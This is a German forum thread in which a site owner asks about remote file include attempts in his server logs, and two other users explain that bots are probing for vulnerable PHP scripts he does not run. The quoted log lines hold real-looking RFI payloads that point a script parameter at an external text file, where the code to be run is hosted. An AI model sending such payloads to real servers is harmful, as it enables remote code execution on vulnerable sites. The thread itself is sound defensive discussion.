Remote File Incude Angriff
Fritz
- webserver
Hallo,
Ich habe ständig Seitenaufrufe in dieser oder ähnlicher Form in meinen Serverlogs:
http://www.example.com/datei.php/inc/cmses/aedating4CMS.php
Es scheint sich um einen Angriffsversuch zu handeln. Und irgendwie macht das nervös.
Kann ich solche Versuche blocken?
Es gibt keine Seiten im Format ...datei.php/irgendwas auf meiner Site
Hilft
<Files *.php/*>
order allow,deny
deny from all
</Files>
in der .htaccess, oder ist mein Ansatz falsch/nutzlos/überflüssig?
Gruß Fritz
hallo,
Ich habe ständig Seitenaufrufe in dieser oder ähnlicher Form in meinen Serverlogs:
http://www.example.com/datei.php/inc/cmses/aedating4CMS.php
Vermutlich sieht es ungefähr so aus:
"GET /sitemap.php%20http://myluckypotparty.chat.ru/images? HTTP/1.0"
Es scheint sich um einen Angriffsversuch zu handeln.
Kein "Angriff", aber der Versuch, deinen Server für Spam zu mißbrauchen. Wichtig ist, welchen Statuscode dein Server liefert, es sollte "404" sein.
Kann ich solche Versuche blocken?
Indem du vernünftige Scripts einsetzt, ja.
ist mein Ansatz falsch/nutzlos/überflüssig?
Ja ;-)
Vermutlich ist es völlig nutzlos, irgendwas an einer .htacces fummeln zu wollen. Und solange deine Serverlogs anzeigen, daß solche Zugriffe mit "400", "403" oder "404" beantwortet wurden, braucht dich das nicht weiter zu kümmern.
Grüße aus Berlin
Christoph S.
Hallo,
Vermutlich sieht es ungefähr so aus:
"GET /sitemap.php%20http://myluckypotparty.chat.ru/images? HTTP/1.0"
"GET //inc/cmses/aedating4CMS.php?dir[inc]=http://www.freewebtown.com/ppll2/romania.txt?? HTTP/1.1" 302 304 "-" "libwww-perl/5.803" 181 524
es sollte "404" sein.
:-(
und jetzt? Es wird ja nicht einmal ein Script aufgerufen. Oder doch? Wie soll ich wissen, bei welchem Script ich anpacken soll?
Was passiert denn da eigentlich?
Der Aufruf wird an www.freewebtown.com weitergeleitet. Und? Was passiert auf meinem Server? Was kann/sollte ich dagegen tun?
Gruß Fritz
hallo,
Sven Rautenberg hat dir inzwischen ja auch einen großen Teil deiner Besorgnis genommen.
"GET //inc/cmses/aedating4CMS.php?dir[inc]=http://www.freewebtown.com/ppll2/romania.txt?? HTTP/1.1" 302 304 "-" "libwww-perl/5.803" 181 524
Hm. Da ist das "//" ganz am Anfang etwas irritierend. Ansonst: der Server hat "302" als Statuscode zurückgeliefert. Das ist lustig, aber kein Grund zur Besorgnis.
Was passiert denn da eigentlich?
Ganz kurz und schematisch: da versucht irgendein "bot", Schwachstellen deiner vermeintlich eingesetzten Scripts auszunutzen. Du hast aber solche Scripts gar nicht, also läuft sich der "bot" bei dir tot - aber vielleicht hat er an irgendeienr anderen Stelle im Internet doch Erfolg.
Der Aufruf wird an www.freewebtown.com weitergeleitet. Und? Was passiert auf meinem Server?
Es wird versucht, die Ausführung eines "Scripts" von deinem Server bzw. von deiner Seite aus zu ermöglichen. Das funktinoiert bloß nicht.
Was kann/sollte ich dagegen tun?
Nichts. Du kannst den "bot" ruhig auslachen, da er bei dir nichts Wirksames erreicht.
Ich habe solche Eintragungen in den logs jeden Tag mehrfach - auch bei SELFHTML dürfte es sie zu vielen Dutzend am Tag geben. Und übrigens gibt es im Forums-Archiv auch allerhand Threads zu diesem Thema, aber ich bin jetzt zu faul, die herauszusuchen.
Derzeit mußt du dir also noch überhaupt keine Sorgen machen. Aber du hast vermutlich gelernt, daß es wichtig sein kann, die Serverlogs zu beobachten, und _das_ist tatsächlich wichtig. Wenn es wirklich irgendeinen "Angriff" gibt, siehst du das an den logs auch. Jetzt mußt du bloß noch verstehen lernen, was deine logs wirklich aussagen.
Grüße aus Berlin
Christoph S.
Moin!
Es scheint sich um einen Angriffsversuch zu handeln. Und irgendwie macht das nervös.
Kann ich solche Versuche blocken?
Nein, die Versuche sind nicht blockbar. Dazu müßtest du durch die Leitung kriechen und dem Verursacher den Saft abdrehen. Unwahrscheinlich, dass dir das gelingt.
Es kommt nur drauf an, ob so ein Versuch Wirkung zeigt, oder nicht.
Es gibt keine Seiten im Format ...datei.php/irgendwas auf meiner Site
Dann ist alles bestens. Ein Angriff kann grundsätzlich nur dann eventuellen Erfolg haben, wenn da was ist, was man angreifen kann. Nichtexistente Ressourcen aufrufen bringt nichts.
Hilft
<Files *.php/*>
order allow,deny
deny from all
</Files>in der .htaccess, oder ist mein Ansatz falsch/nutzlos/überflüssig?
Nutzlos und überflüssig.
- Sven Rautenberg
Hallo,
Es gibt keine Seiten im Format ...datei.php/irgendwas auf meiner Site
Dann ist alles bestens.
Klingt beruhigend. Danke
Gruß Fritz
Hallo,
Danke an Sven und Christoph
Gruß Fritz